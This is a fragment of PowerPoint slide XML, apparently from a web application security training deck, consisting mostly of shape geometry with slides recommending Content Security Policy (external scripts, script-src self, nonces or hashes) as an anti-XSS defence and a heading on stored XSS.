                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>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36179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66" y="457200"/>
            <a:ext cx="5314933" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1649293"/>
            <a:ext cx="8229600" cy="3147460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-XSS W3C standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP 3.0 WSC Candidate published September </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.w3.org/TR/CSP3/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add the Content-Security-Policy response header to instruct the browser that CSP is in use. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are two major features that will enable CSP to help stop XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must move all inline script into external files and then enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="self" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or similar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must use the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nonce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feature to provide integrity for inline scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-1"/>
            <a:ext cx="2695715" cy="1094872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4A501E7-12AD-6341-9310-00DD67319E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5078153"/>
            <a:ext cx="3797284" cy="1643323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2087442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AA1D3D-D8B0-D145-8FE3-104EC6248D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A4E46F-2E90-F749-99A3-3D2DEDCA7F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9144000" cy="5711868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E83B34-D3DE-2949-BAD3-35489FF18AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="112735" y="5817732"/>
            <a:ext cx="2680569" cy="977030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031FFE77-0AE2-9C48-BB0B-668CE7B10B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3083442" y="6121581"/>
            <a:ext cx="5603358" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>https://www.youtube.com/watch?v=uf12a-0AluI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40236702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bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="4553143" y="3227876"/>
            <a:ext cx="1566346" cy="1568262"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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gray">
          <a:xfrm flipV="1">
            <a:off x="4553143" y="2792890"/>
            <a:ext cx="2663450" cy="2809517"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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87" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="2379539" y="2333480"/>
            <a:ext cx="3143280" cy="12285"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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7" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2334716" y="3162391"/>
            <a:ext cx="892583" cy="1045985"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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Persistent/Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6717580" y="1883023"/>
            <a:ext cx="933457" cy="651198"/>
            <a:chOff x="5416743" y="3058586"/>
            <a:chExt cx="1211786" cy="1001811"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5416878" y="3058586"/>
              <a:ext cx="1211651" cy="850916"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2469709" h="1620220">
                  <a:moveTo>
                    <a:pt x="256280" y="74060"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="185808" y="74060"/>
                    <a:pt x="128680" y="131188"/>
                    <a:pt x="128680" y="201660"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128680" y="1427773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="128680" y="1498245"/>
                    <a:pt x="185808" y="1555373"/>
                    <a:pt x="256280" y="1555373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2214877" y="1555373"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2285349" y="1555373"/>
                    <a:pt x="2342477" y="1498245"/>
                    <a:pt x="2342477" y="1427773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2342477" y="201660"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342477" y="131188"/>
                    <a:pt x="2285349" y="74060"/>
                    <a:pt x="2214877" y="74060"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="139566" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2330143" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2407223" y="0"/>
                    <a:pt x="2469709" y="62486"/>
                    <a:pt x="2469709" y="139566"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2469709" y="1480654"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2469709" y="1557734"/>
                    <a:pt x="2407223" y="1620220"/>
                    <a:pt x="2330143" y="1620220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139566" y="1620220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="62486" y="1620220"/>
                    <a:pt x="0" y="1557734"/>
                    <a:pt x="0" y="1480654"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="139566"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62486"/>
                    <a:pt x="62486" y="0"/>
                    <a:pt x="1395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17" name="Rounded Rectangle 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5416743" y="3975822"/>
